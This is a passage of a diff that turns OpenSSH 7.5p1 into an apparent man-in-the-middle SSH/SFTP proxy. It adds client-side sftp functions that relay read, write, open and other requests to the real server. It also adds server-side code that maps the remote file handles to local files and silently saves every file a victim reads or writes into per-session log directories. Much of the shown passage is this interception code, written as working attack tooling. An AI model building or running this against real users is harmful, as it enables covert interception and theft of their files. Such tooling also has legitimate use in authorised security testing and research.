2239. +   return 1;
2240. +}
2241. +
2242. +int
2243. +mitm_do_fstatvfs(struct sftp_conn *conn, const u_char *handle, size_t handle_len, struct statvfs *st, u_int *status)
2244. +{
2245. +   struct sshbuf *msg;
2246. +   int r;
2247. +   u_int id;
2248. +   struct sftp_statvfs sftp_st;
2249. +
2250. +   if ((conn->exts & SFTP_EXT_FSTATVFS) == 0)
2251. +       return SSH2_FX_OP_UNSUPPORTED;
2252. +
2253. +   id = conn->msg_id++;
2254. +
2255. +   if ((msg = sshbuf_new()) == NULL)
2256. +       fatal("%s: sshbuf_new failed", __func__);
2257. +   sshbuf_reset(msg);
2258. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_EXTENDED)) != 0 ||
2259. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2260. +       (r = sshbuf_put_cstring(msg, "fstatvfs@openssh.com")) != 0 ||
2261. +       (r = sshbuf_put_string(msg, handle, (u_int)handle_len)) != 0)
2262. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2263. +   send_msg(conn, msg);
2264. +   sshbuf_free(msg); msg = NULL;
2265. +
2266. +   if (get_decode_statvfs(conn, &sftp_st, id, 1, status) == -1)
2267. +     return -1;
2268. +
2269. +   st->f_bsize = sftp_st.f_bsize;
2270. +   st->f_frsize = sftp_st.f_frsize;
2271. +   st->f_blocks = sftp_st.f_blocks;
2272. +   st->f_bfree = sftp_st.f_bfree;
2273. +   st->f_bavail = sftp_st.f_bavail;
2274. +   st->f_files = sftp_st.f_files;
2275. +   st->f_ffree = sftp_st.f_ffree;
2276. +   st->f_favail = sftp_st.f_favail;
2277. +   st->f_fsid = sftp_st.f_fsid;
2278. +   st->f_flag = sftp_st.f_flag;
2279. +   st->f_namemax = sftp_st.f_namemax;
2280. +   return 1;
2281. +}
2282. +
2283. +u_int
2284. +mitm_do_hardlink(struct sftp_conn *conn, const char *oldpath, const char *newpath)
2285. +{
2286. +   struct sshbuf *msg;
2287. +   u_int id;
2288. +   int r;
2289. +
2290. +   if ((conn->exts & SFTP_EXT_HARDLINK) == 0)
2291. +       return SSH2_FX_OP_UNSUPPORTED;
2292. +
2293. +   if ((msg = sshbuf_new()) == NULL)
2294. +       fatal("%s: sshbuf_new failed", __func__);
2295. +
2296. +   /* Send link request */
2297. +   id = conn->msg_id++;
2298. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_EXTENDED)) != 0 ||
2299. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2300. +       (r = sshbuf_put_cstring(msg, "hardlink@openssh.com")) != 0 ||
2301. +       (r = sshbuf_put_cstring(msg, oldpath)) != 0 ||
2302. +       (r = sshbuf_put_cstring(msg, newpath)) != 0)
2303. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2304. +   send_msg(conn, msg);
2305. +   debug3("Sent message hardlink@openssh.com \"%s\" -> \"%s\"",
2306. +          oldpath, newpath);
2307. +   sshbuf_free(msg); msg = NULL;
2308. +
2309. +   return get_status(conn, id);
2310. +}
2311. +
2312. +u_int
2313. +mitm_do_fsync(struct sftp_conn *conn, u_char *handle, size_t handle_len)
2314. +{
2315. +   struct sshbuf *msg;
2316. +   u_int id;
2317. +   int r;
2318. +
2319. +   /* Silently return if the extension is not supported */
2320. +   if ((conn->exts & SFTP_EXT_FSYNC) == 0)
2321. +       return SSH2_FX_OP_UNSUPPORTED;
2322. +
2323. +   /* Send fsync request */
2324. +   if ((msg = sshbuf_new()) == NULL)
2325. +       fatal("%s: sshbuf_new failed", __func__);
2326. +   id = conn->msg_id++;
2327. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_EXTENDED)) != 0 ||
2328. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2329. +       (r = sshbuf_put_cstring(msg, "fsync@openssh.com")) != 0 ||
2330. +       (r = sshbuf_put_string(msg, handle, (u_int)handle_len)) != 0)
2331. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2332. +   send_msg(conn, msg);
2333. +   debug3("Sent message fsync@openssh.com I:%u", id);
2334. +   sshbuf_free(msg); msg = NULL;
2335. +
2336. +   return get_status(conn, id);
2337. +}
2338. +
2339. +/* Returns the handle on success (which must be free()'ed by the caller) and sets the "handle_len" arg, or NULL.  On failure, the "status" arg is set. */
2340. +u_char *
2341. +mitm_do_open(struct sftp_conn *conn, char *remote_path, u_int32_t pflags, Attrib *a, size_t *handle_len, u_int *status) {
2342. +   u_char *handle = NULL;
2343. +   struct sshbuf *msg;
2344. +   u_int id;
2345. +   int r;
2346. +
2347. +   if ((msg = sshbuf_new()) == NULL)
2348. +       fatal("%s: sshbuf_new failed", __func__);
2349. +   id = conn->msg_id++;
2350. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_OPEN)) != 0 ||
2351. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2352. +       (r = sshbuf_put_cstring(msg, remote_path)) != 0 ||
2353. +       (r = sshbuf_put_u32(msg, pflags)) != 0 ||
2354. +       (r = encode_attrib(msg, a)) != 0)
2355. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2356. +   send_msg(conn, msg);
2357. +   debug3("Sent message SSH2_FXP_OPEN I:%u P:%s", id, remote_path);
2358. +
2359. +   handle = get_handle(conn, id, status, handle_len, "remote open(\"%s\")", remote_path);
2360. +   sshbuf_free(msg); msg = NULL;
2361. +   return handle;
2362. +}
2363. +
2364. +/* Returns a pointer to a char buffer of read data on success (which must be free()'ed by the caller) with the "read_len" argument set with the number bytes returned, or NULL on failure with the "status" arg set accordingly. */
2365. +u_char *
2366. +mitm_do_read(struct sftp_conn *conn, const u_char *handle, u_int handle_len, u_int64_t offset, u_int32_t read_len, size_t *ret_len, u_int *status) {
2367. +   struct sshbuf *msg;
2368. +   int r;
2369. +   u_int id;
2370. +   u_char type;
2371. +   u_char *ret = NULL;
2372. +
2373. +   if ((msg = sshbuf_new()) == NULL)
2374. +       fatal("%s: sshbuf_new failed", __func__);
2375. +
2376. +   id = conn->msg_id++;
2377. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_READ)) != 0 ||
2378. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2379. +       (r = sshbuf_put_string(msg, handle, handle_len)) != 0 ||
2380. +       (r = sshbuf_put_u64(msg, offset)) != 0 ||
2381. +       (r = sshbuf_put_u32(msg, read_len)) != 0)
2382. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2383. +
2384. +   send_msg(conn, msg);
2385. +   sshbuf_reset(msg);
2386. +   get_msg(conn, msg);
2387. +
2388. +   if ((r = sshbuf_get_u8(msg, &type)) != 0 ||
2389. +       (r = sshbuf_get_u32(msg, &id)) != 0)
2390. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2391. +
2392. +   if (type == SSH2_FXP_STATUS) {
2393. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
2394. +           fatal("%s: buffer error: %s", __func__, ssh_err(r));
2395. +       sshbuf_free(msg); msg = NULL;
2396. +       *ret_len = 0;
2397. +       return NULL;
2398. +   } else if (type == SSH2_FXP_DATA) {
2399. +       if ((r = sshbuf_get_string(msg, &ret, ret_len)) != 0)
2400. +           fatal("%s: buffer error: %s", __func__, ssh_err(r));
2401. +   } else
2402. +       fatal("%s: unexpected type received: %u", __func__, type);
2403. +
2404. +   sshbuf_free(msg); msg = NULL;
2405. +   return ret;
2406. +}
2407. +
2408. +u_int
2409. +mitm_do_write(struct sftp_conn *conn, const u_char *handle, u_int handle_len, u_int64_t offset, u_char *buf, u_int buf_len) {
2410. +   struct sshbuf *msg;
2411. +   int r;
2412. +   u_int id;
2413. +   u_char type;
2414. +   u_int status = 0;
2415. +
2416. +   if ((msg = sshbuf_new()) == NULL)
2417. +       fatal("%s: sshbuf_new failed", __func__);
2418. +
2419. +   id = conn->msg_id++;
2420. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_WRITE)) != 0 ||
2421. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2422. +       (r = sshbuf_put_string(msg, handle, handle_len)) != 0 ||
2423. +       (r = sshbuf_put_u64(msg, offset)) != 0 ||
2424. +       (r = sshbuf_put_string(msg, buf, buf_len)) != 0)
2425. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2426. +
2427. +   send_msg(conn, msg);
2428. +   sshbuf_reset(msg);
2429. +   get_msg(conn, msg);
2430. +
2431. +   if ((r = sshbuf_get_u8(msg, &type)) != 0 ||
2432. +       (r = sshbuf_get_u32(msg, &id)) != 0)
2433. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2434. +
2435. +   if (type != SSH2_FXP_STATUS)
2436. +       fatal("Expected SSH2_FXP_STATUS(%d) packet, got %d", SSH2_FXP_STATUS, type);
2437. +
2438. +   if ((r = sshbuf_get_u32(msg, &status)) != 0)
2439. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2440. +
2441. +   sshbuf_free(msg); msg = NULL;
2442. +   return status;
2443. +}
2444. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-client.h openssh-7.5p1-mitm/sftp-client.h
2445. --- openssh-7.5p1/sftp-client.h 2017-03-19 22:39:27.000000000 -0400
2446. +++ openssh-7.5p1-mitm/sftp-client.h    2018-06-12 17:44:46.345760658 -0400
2447. @@ -21,6 +21,9 @@
2448. #ifndef _SFTP_CLIENT_H
2449. #define _SFTP_CLIENT_H
2450.  
2451. +#include <sys/statvfs.h>
2452. +#include "misc.h"
2453. +
2454. #ifdef USE_SYSTEM_GLOB
2455. # include <glob.h>
2456. #else
2457. @@ -53,6 +56,23 @@
2458.     u_int64_t f_namemax;
2459. };
2460.  
2461. +struct sftp_conn {
2462. +   int fd_in;
2463. +   int fd_out;
2464. +   u_int transfer_buflen;
2465. +   u_int num_requests;
2466. +   u_int version;
2467. +   u_int msg_id;
2468. +#define SFTP_EXT_POSIX_RENAME  0x00000001
2469. +#define SFTP_EXT_STATVFS   0x00000002
2470. +#define SFTP_EXT_FSTATVFS  0x00000004
2471. +#define SFTP_EXT_HARDLINK  0x00000008
2472. +#define SFTP_EXT_FSYNC     0x00000010
2473. +   u_int exts;
2474. +   u_int64_t limit_kbps;
2475. +   struct bwlimit bwlimit_in, bwlimit_out;
2476. +};
2477. +
2478. /*
2479.  * Initialise a SSH filexfer connection. Returns NULL on error or
2480.  * a pointer to a initialized sftp_conn struct on success.
2481. @@ -80,10 +100,10 @@
2482. int do_rmdir(struct sftp_conn *, const char *);
2483.  
2484. /* Get file attributes of 'path' (follows symlinks) */
2485. -Attrib *do_stat(struct sftp_conn *, const char *, int);
2486. +Attrib *do_stat(struct sftp_conn *, const char *, int, u_int *);
2487.  
2488. /* Get file attributes of 'path' (does not follow symlinks) */
2489. -Attrib *do_lstat(struct sftp_conn *, const char *, int);
2490. +Attrib *do_lstat(struct sftp_conn *, const char *, int, u_int *);
2491.  
2492. /* Set file attributes of 'path' */
2493. int do_setstat(struct sftp_conn *, const char *, Attrib *);
2494. @@ -92,7 +112,7 @@
2495. int do_fsetstat(struct sftp_conn *, const u_char *, u_int, Attrib *);
2496.  
2497. /* Canonicalise 'path' - caller must free result */
2498. -char *do_realpath(struct sftp_conn *, const char *);
2499. +char *do_realpath(struct sftp_conn *, const char *, u_int *);
2500.  
2501. /* Get statistics for filesystem hosting file at "path" */
2502. int do_statvfs(struct sftp_conn *, const char *, struct sftp_statvfs *, int);
2503. @@ -139,4 +159,42 @@
2504. /* Concatenate paths, taking care of slashes. Caller must free result. */
2505. char *path_append(const char *, const char *);
2506.  
2507. +u_int mitm_do_close(struct sftp_conn *conn, const u_char *handle, u_int handle_len);
2508. +
2509. +u_int mitm_do_fsetstat(struct sftp_conn *conn, const u_char *handle, u_int handle_len, Attrib *a);
2510. +
2511. +Attrib *mitm_do_fstat(struct sftp_conn *conn, const u_char *handle, u_int handle_len, int quiet, u_int *status);
2512. +
2513. +int mitm_do_fstatvfs(struct sftp_conn *conn, const u_char *handle, size_t handle_len, struct statvfs *st, u_int *status);
2514. +
2515. +u_int mitm_do_fsync(struct sftp_conn *conn, u_char *handle, size_t handle_len);
2516. +
2517. +u_int mitm_do_hardlink(struct sftp_conn *conn, const char *oldpath, const char *newpath);
2518. +
2519. +u_int mitm_do_mkdir(struct sftp_conn *conn, const char *path, Attrib *a);
2520. +
2521. +u_char *mitm_do_open(struct sftp_conn *conn, char *remote_path, u_int32_t pflags, Attrib *a, size_t *handle_len, u_int *status);
2522. +
2523. +u_char *mitm_do_opendir(struct sftp_conn *conn, const char *path, size_t *handle_len, int *status);
2524. +
2525. +u_char *mitm_do_read(struct sftp_conn *conn, const u_char *handle, u_int handle_len, u_int64_t offset, u_int32_t read_len, size_t *ret_len, u_int *status);
2526. +
2527. +Stat *mitm_do_readdir(struct sftp_conn *conn, u_int32_t id, u_char *handle_str, size_t handle_len, u_int *count, int *status);
2528. +
2529. +int mitm_do_readlink(struct sftp_conn *conn, const char *path, u_int *status, char **filename, char **longname, Attrib *a);
2530. +
2531. +u_int mitm_do_rename(struct sftp_conn *conn, const char *oldpath, const char *newpath, int force_legacy);
2532. +
2533. +u_int mitm_do_rmdir(struct sftp_conn *conn, const char *path);
2534. +
2535. +u_int mitm_do_rm(struct sftp_conn *conn, const char *path);
2536. +
2537. +u_int mitm_do_setstat(struct sftp_conn *conn, const char *path, Attrib *a);
2538. +
2539. +int mitm_do_statvfs(struct sftp_conn *conn, const char *path, struct statvfs *st, u_int *status);
2540. +
2541. +u_int mitm_do_symlink(struct sftp_conn *conn, const char *oldpath, const char *newpath);
2542. +
2543. +u_int mitm_do_write(struct sftp_conn *conn, const u_char *handle, u_int handle_len, u_int64_t offset, u_char *buf, u_int buf_len);
2544. +
2545. #endif
2546. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-common.h openssh-7.5p1-mitm/sftp-common.h
2547. --- openssh-7.5p1/sftp-common.h 2017-03-19 22:39:27.000000000 -0400
2548. +++ openssh-7.5p1-mitm/sftp-common.h    2018-06-12 17:44:46.345760658 -0400
2549. @@ -50,3 +50,12 @@
2550.  char   *ls_file(const char *, const struct stat *, int, int);
2551.  
2552. const char *fx2txt(int);
2553. +
2554. +/* portable attributes, etc. */
2555. +typedef struct Stat Stat;
2556. +
2557. +struct Stat {
2558. +   char *name;
2559. +   char *long_name;
2560. +   Attrib attrib;
2561. +};
2562. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-glob.c openssh-7.5p1-mitm/sftp-glob.c
2563. --- openssh-7.5p1/sftp-glob.c   2017-03-19 22:39:27.000000000 -0400
2564. +++ openssh-7.5p1-mitm/sftp-glob.c  2018-06-12 17:44:46.345760658 -0400
2565. @@ -111,8 +111,9 @@
2566. fudge_lstat(const char *path, struct stat *st)
2567. {
2568.     Attrib *a;
2569. +   u_int status;
2570.  
2571. -   if (!(a = do_lstat(cur.conn, (char *)path, 1)))
2572. +   if (!(a = do_lstat(cur.conn, (char *)path, 1, &status)))
2573.         return(-1);
2574.  
2575.     attrib_to_stat(a, st);
2576. @@ -124,8 +125,9 @@
2577. fudge_stat(const char *path, struct stat *st)
2578. {
2579.     Attrib *a;
2580. +   u_int status;
2581.  
2582. -   if (!(a = do_stat(cur.conn, (char *)path, 1)))
2583. +   if (!(a = do_stat(cur.conn, (char *)path, 1, &status)))
2584.         return(-1);
2585.  
2586.     attrib_to_stat(a, st);
2587. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp.h openssh-7.5p1-mitm/sftp.h
2588. --- openssh-7.5p1/sftp.h    2017-03-19 22:39:27.000000000 -0400
2589. +++ openssh-7.5p1-mitm/sftp.h   2018-06-12 17:44:46.345760658 -0400
2590. @@ -97,5 +97,5 @@
2591.  
2592. struct passwd;
2593.  
2594. -int    sftp_server_main(int, char **, struct passwd *);
2595. +int    sftp_server_main(int, char **, struct passwd *, char *, unsigned short, char *, char *, char *, char *);
2596.  void   sftp_server_cleanup_exit(int) __attribute__((noreturn));
2597. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-server.c openssh-7.5p1-mitm/sftp-server.c
2598. --- openssh-7.5p1/sftp-server.c 2017-03-19 22:39:27.000000000 -0400
2599. +++ openssh-7.5p1-mitm/sftp-server.c    2018-06-12 17:44:46.345760658 -0400
2600. @@ -39,6 +39,7 @@
2601. #include <time.h>
2602. #include <unistd.h>
2603. #include <stdarg.h>
2604. +#include <sys/wait.h>
2605.  
2606. #include "xmalloc.h"
2607. #include "sshbuf.h"
2608. @@ -50,6 +51,8 @@
2609.  
2610. #include "sftp.h"
2611. #include "sftp-common.h"
2612. +#include "sftp-client.h"
2613. +#include "lol.h"
2614.  
2615. /* Our verbosity */
2616. static LogLevel log_level = SYSLOG_LEVEL_ERROR;
2617. @@ -74,15 +77,41 @@
2618. /* Requests that are allowed/denied */
2619. static char *request_whitelist, *request_blacklist;
2620.  
2621. -/* portable attributes, etc. */
2622. -typedef struct Stat Stat;
2623. -
2624. -struct Stat {
2625. -   char *name;
2626. -   char *long_name;
2627. -   Attrib attrib;
2628. +pid_t sshpid = -1;
2629. +volatile sig_atomic_t interrupted = 0;
2630. +int showprogress = 0;
2631. +extern struct sftp_conn *client_conn;
2632. +int session_log_fd = -1;      /* A descriptor to this session's log file. */
2633. +char *session_log_dir = NULL; /* The directory to store SFTP files in. */
2634. +
2635. +#define MITM_HANDLE_TYPE_FILE 0
2636. +#define MITM_HANDLE_TYPE_DIR 1
2637. +
2638. +/* This maps a remote server's handle to a local file descriptor. */
2639. +typedef struct MITMHandle MITMHandle;
2640. +struct MITMHandle {
2641. +  int in_use;          /* If 1, this slot is in use, otherwise it is unallocated.  */
2642. +  u_int type;          /* One of the MITM_HANDLE_TYPE_ flags. */
2643. +  char *handle_str;    /* The file handle on the remote server. */
2644. +  size_t handle_len;   /* The number of bytes the above file handle is. */
2645. +  int fd;              /* The local file descriptor. */
2646. +  u_int32_t pflags;    /* The portable flags this file was opened with. */
2647. +  char *original_path; /* The full path of the original file transferred. */
2648. +  char *actual_path;   /* The relative path that the file was saved to locally. */
2649. +  char *file_listing;  /* The file listing (if type == MITM_HANDLE_TYPE_DIR). */
2650. +  size_t file_listing_size; /* The size of the file_listing buffer. */
2651. };
2652.  
2653. +MITMHandle *mitm_handles = NULL; /* Our array of handles. */
2654. +u_int num_mitm_handles = 0;  /* The current size of the mitm_handles array. */
2655. +
2656. +/* When mitm_handles runs out of free slots, it will grow by this many. */
2657. +#define MITM_HANDLES_NEW_BLOCK 16
2658. +
2659. +/* The block size that the MITMHandle.file_listing buffer grows by. */
2660. +#define MITM_HANDLES_FILE_LISTING_BLOCK 1024
2661. +
2662. +
2663. /* Packet handlers */
2664. static void process_open(u_int32_t id);
2665. static void process_close(u_int32_t id);
2666. @@ -109,6 +138,29 @@
2667. static void process_extended_fsync(u_int32_t id);
2668. static void process_extended(u_int32_t id);
2669.  
2670. +struct sftp_conn *make_connection(char *host, unsigned short port, char *username, char *password_and_fingerprint_socket_name);
2671. +void mitm_init_log(char *log_filepath, char *log_dir);
2672. +void mitm_handle_close(const char *handle_str, size_t handle_len);
2673. +void mitm_handle_free(MITMHandle *mh);
2674. +void mitm_handle_init(MITMHandle *mh);
2675. +void mitm_handle_new(u_int type, char *original_name, u_int32_t pflags, const char *handle_str, size_t handle_len);
2676. +void mitm_handle_read_write(char *handle_str, size_t handle_len, u_int64_t offset, u_char *buf, size_t buf_len);
2677. +MITMHandle *mitm_handle_search(const char *handle_str, size_t handle_len);
2678. +void sftp_log(u_int status, const char *fmt, ...);
2679. +void sftp_log_no_filter(u_int status, const char *fmt, ...);
2680. +void _sftp_log(u_int status, u_int do_xss_filtering, char *buf, int buf_len);
2681. +void sftp_log_close(u_int status, char *handle_str, size_t handle_len);
2682. +void sftp_log_attrib(const char *func, u_int status, char *name, Attrib *a);
2683. +void sftp_log_handle_attrib(const char *func, u_int status, char *handle_str, size_t handle_len, Attrib *a);
2684. +void sftp_log_readdir(char *handle_str, size_t handle_len, char *listing);
2685. +void sftp_log_statvfs(u_int status, char *path, struct statvfs *st);
2686. +void sftp_log_fstatvfs(u_int status, char *handle_str, size_t handle_len, struct statvfs *st);
2687. +void sftp_log_fsync(u_int status, char *handle_str, size_t handle_len);
2688. +void xss_sanitize(char *buf, int buf_len);
2689. +
2690. +/* The error message for functions that search for file handles. */
2691. +#define CANT_FIND_HANDLE "MITM: %s: can't find handle!"
2692. +
2693. struct sftp_handler {
2694.     const char *name;   /* user-visible name for fine-grained perms */
2695.     const char *ext_name;   /* extended request name */
2696. @@ -179,6 +231,7 @@
2697.     return 1;
2698. }
2699.  
2700. +/*
2701. static int
2702. errno_to_portable(int unixerrno)
2703. {
2704. @@ -236,7 +289,7 @@
2705.         flags |= O_EXCL;
2706.     return flags;
2707. }
2708. -
2709. +*/
2710. static const char *
2711. string_from_portable(int pflags)
2712. {
2713. @@ -266,6 +319,7 @@
2714.     return ret;
2715. }
2716.  
2717. +
2718. /* handle handles */
2719.  
2720. typedef struct Handle Handle;
2721. @@ -289,6 +343,195 @@
2722. u_int num_handles = 0;
2723. int first_unused_handle = -1;
2724.  
2725. +
2726. +/* Frees a handle slot and re-initializes it. */
2727. +void mitm_handle_free(MITMHandle *mh) {
2728. +  if (mh != NULL) {
2729. +    free(mh->handle_str);
2730. +    free(mh->original_path);
2731. +    free(mh->actual_path);
2732. +    free(mh->file_listing);
2733. +    mitm_handle_init(mh);
2734. +  }
2735. +}
2736. +
2737. +/* Initializes a handle slot. Use mitm_handle_free() on previously-occupied
2738. + * slots. */
2739. +void mitm_handle_init(MITMHandle *mh) {
2740. +  if (mh != NULL) {
2741. +    mh->in_use = 0;
2742. +    mh->type = 0;
2743. +    mh->handle_str = NULL;
2744. +    mh->handle_len = 0;
2745. +    mh->fd = -1;
2746. +    mh->pflags = 0;
2747. +    mh->original_path = NULL;
2748. +    mh->actual_path = NULL;
2749. +    mh->file_listing = NULL;
2750. +    mh->file_listing_size = 0;
2751. +  }
2752. +}
2753. +
2754. +/* Adds a new handle, given its type (MITM_HANDLE_TYPE_{FILE,DIR}), original
2755. + * path, open flags, and remote server handle. */
2756. +void mitm_handle_new(u_int type, char *original_path, u_int32_t pflags, const char *handle_str, size_t handle_len) {
2757. +  int unused_handle = -1, actual_path_len = 0;;
2758. +  u_int i = 0, num_tries = 0, r = 0;
2759. +  char file_path[PATH_MAX];
2760. +  char *file_prefix = NULL, *temp_name = NULL, *log_dir = NULL;
2761. +
2762. +  /* On first invokation, the mitm_handles array is unallocated. */
2763. +  if (mitm_handles == NULL) {
2764. +    if ((mitm_handles = reallocarray(NULL, MITM_HANDLES_NEW_BLOCK, sizeof(MITMHandle))) == NULL)
2765. +      fatal("Could not allocate array for MITMHandles.");
2766. +
2767. +    num_mitm_handles = MITM_HANDLES_NEW_BLOCK;
2768. +
2769. +    /* Initializes all the slots. */
2770. +    for (i = 0; i < num_mitm_handles; i++)
2771. +      mitm_handle_init(&mitm_handles[i]);
2772. +
2773. +    /* Since we just allocated a new array, we know slot 0 is unoccupied. */
2774. +    unused_handle = 0;
2775. +  }
2776. +
2777. +  /* Sequentially search for an unused slot in the array. */
2778. +  for (i = 0; (i < num_mitm_handles) && (unused_handle == -1); i++) {
2779. +    /* If we found one, save its slot index. */
2780. +    if (mitm_handles[i].in_use == 0)
2781. +      unused_handle = i;
2782. +  }
2783. +
2784. +  /* If, after searching the entire array, we haven't found an open slot, we
2785. +   * must grow the array. */
2786. +  if (unused_handle == -1) {
2787. +    unused_handle = num_mitm_handles;
2788. +
2789. +    /* Make the array bigger by one block size. */
2790. +    num_mitm_handles += MITM_HANDLES_NEW_BLOCK;
2791. +    if ((mitm_handles = reallocarray(mitm_handles, num_mitm_handles, sizeof(MITMHandle))) == NULL)
2792. +      fatal("Could not allocate array for MITMHandles.");
2793. +
2794. +    /* Initialize the slots we just expanded. */
2795. +    for (; i < num_mitm_handles; i++)
2796. +      mitm_handle_init(&mitm_handles[i]);
2797. +  }
2798. +
2799. +  /* Mark this slot as being in use. */
2800. +  mitm_handles[unused_handle].in_use = 1;
2801. +
2802. +  /* Set the file/directory flag. */
2803. +  mitm_handles[unused_handle].type = type;
2804. +
2805. +  /* Allocate a buffer for the remote server handle data, then copy it. */
2806. +  if ((mitm_handles[unused_handle].handle_str = xmalloc(handle_len)) == NULL)
2807. +    fatal("Could not allocate array for handle string.");
2808. +  memcpy(mitm_handles[unused_handle].handle_str, handle_str, handle_len);
2809. +
2810. +  /* Set the handle length. */
2811. +  mitm_handles[unused_handle].handle_len = handle_len;
2812. +
2813. +  /* Copy the original full path of the file being opened on the remote
2814. +   * server, and do XSS filtering on it. */
2815. +  mitm_handles[unused_handle].original_path = xstrdup(original_path);
2816. +  xss_sanitize(mitm_handles[unused_handle].original_path, strlen(mitm_handles[unused_handle].original_path));
2817. +
2818. +  /* Save the portable flags its being opened with. */
2819. +  mitm_handles[unused_handle].pflags = pflags;
2820. +
2821. +  /* If this is a file, find a unique local filename, and open a handle to
2822. +   * it. */
2823. +  if (type == MITM_HANDLE_TYPE_FILE) {
2824. +
2825. +    /* Extract the filename of the path. */
2826. +    temp_name = xstrdup(original_path);
2827. +    file_prefix = basename(temp_name);
2828. +
2829. +    /* Ensure that a relative path wasn't snuck in. */
2830. +    if ((memmem(file_prefix, strlen(file_prefix), "..", 2) != NULL) || (memmem(file_prefix, strlen(file_prefix), "/", 1) != NULL))
2831. +      file_prefix = "file";
2832. +
2833. +    /* Construct a path to save the file to locally, such as
2834. +     * "/home/ssh-mitm/sftp_session_0/lol.txt". */
2835. +    snprintf(file_path, sizeof(file_path) - 1, "%s%s", session_log_dir, file_prefix);
2836. +
2837. +    /* Find a unique local filename. */
2838. +    while (mitm_handles[unused_handle].fd < 0) {
2839. +      mitm_handles[unused_handle].fd = open(file_path, O_CREAT | O_EXCL | O_NOATIME | O_NOFOLLOW | O_WRONLY, S_IRUSR | S_IWUSR);
2840. +
2841. +      num_tries++;
2842. +
2843. +      /* If open() failed, append "_X" to the file path, where X is an
2844. +       * incrementing integer. */
2845. +      if (mitm_handles[unused_handle].fd < 0) {
2846. +   snprintf(file_path, sizeof(file_path) - 1, "%s%s_%u", session_log_dir, file_prefix, num_tries);
2847. +      }
2848. +    }
2849. +    free(temp_name); temp_name = NULL;
2850. +
2851. +    /* Get the base name of our log directory.  Because we're using GNU
2852. +     * basename(), we need to cut off the trailing slash, otherwise we get back
2853. +     * the empty string.
2854. +     *
2855. +     * "/home/ssh-mitm/sftp_session_0/" -> "sftp_session_0" */
2856. +    temp_name = xstrdup(session_log_dir);
2857. +    if (strlen(temp_name) > 0)
2858. +      temp_name[strlen(temp_name) - 1] = '\0';
2859. +    log_dir = basename(temp_name);
2860. +
2861. +    /* Get the basename of the file we wrote.
2862. +     * "/home/ssh-mitm/sftp_session_0/lol.txt" -> "lol.txt" */
2863. +    file_prefix = basename(file_path);
2864. +    actual_path_len = strlen(log_dir) + 1 + strlen(file_prefix) + 1;
2865. +    mitm_handles[unused_handle].actual_path = calloc(actual_path_len, sizeof(char));
2866. +
2867. +    /* Create the relative path, i.e.: "sftp_session_0/lol.txt". */
2868. +    r = snprintf(mitm_handles[unused_handle].actual_path, actual_path_len, "%s/%s", log_dir, file_prefix);
2869. +    xss_sanitize(mitm_handles[unused_handle].actual_path, r);
2870. +
2871. +    free(temp_name); temp_name = NULL;
2872. +  }
2873. +}
2874. +
2875. +/* Write discovered data to our local file.  We do this for both remote server
2876. + * reads and writes. */
2877. +void mitm_handle_read_write(char *handle_str, size_t handle_len, u_int64_t offset, u_char *buf, size_t buf_len) {
2878. +  MITMHandle *mh = NULL;
2879. +
2880. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL) {
2881. +    lseek(mh->fd, offset, SEEK_SET);
2882. +    write(mh->fd, buf, buf_len);
2883. +  } else
2884. +    logit(CANT_FIND_HANDLE, __func__);
2885. +}
2886. +
2887. +/* Close the local file descriptor associated with this remote server handle.
2888. + * Frees the slot this handle is in. */
2889. +void mitm_handle_close(const char *handle_str, size_t handle_len) {
2890. +  MITMHandle *mh = NULL;
2891. +
2892. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL) {
2893. +    close(mh->fd);
2894. +    mitm_handle_free(mh);
2895. +  } else
2896. +    logit(CANT_FIND_HANDLE, __func__);
2897. +}
2898. +
2899. +/* Searches for an MITMHandle, given its remote server handle and length.
2900. + * Returns a pointer to it on success, or NULL if it could not be found. */
2901. +MITMHandle *mitm_handle_search(const char *handle_str, size_t handle_len) {
2902. +  u_int i = 0;
2903. +
2904. +  for (i = 0; i < num_mitm_handles; i++) {
2905. +    if ((mitm_handles[i].in_use == 1) && (mitm_handles[i].handle_len == handle_len) && (memcmp(mitm_handles[i].handle_str, handle_str, handle_len) == 0)) {
2906. +      return &mitm_handles[i];
2907. +    }
2908. +  }
2909. +  return NULL;
2910. +}
2911. +
2912. +
2913. +/*
2914. static void handle_unused(int i)
2915. {
2916.     handles[i].use = HANDLE_UNUSED;
2917. @@ -321,6 +564,7 @@
2918.  
2919.     return i;
2920. }
2921. +*/
2922.  
2923. static int
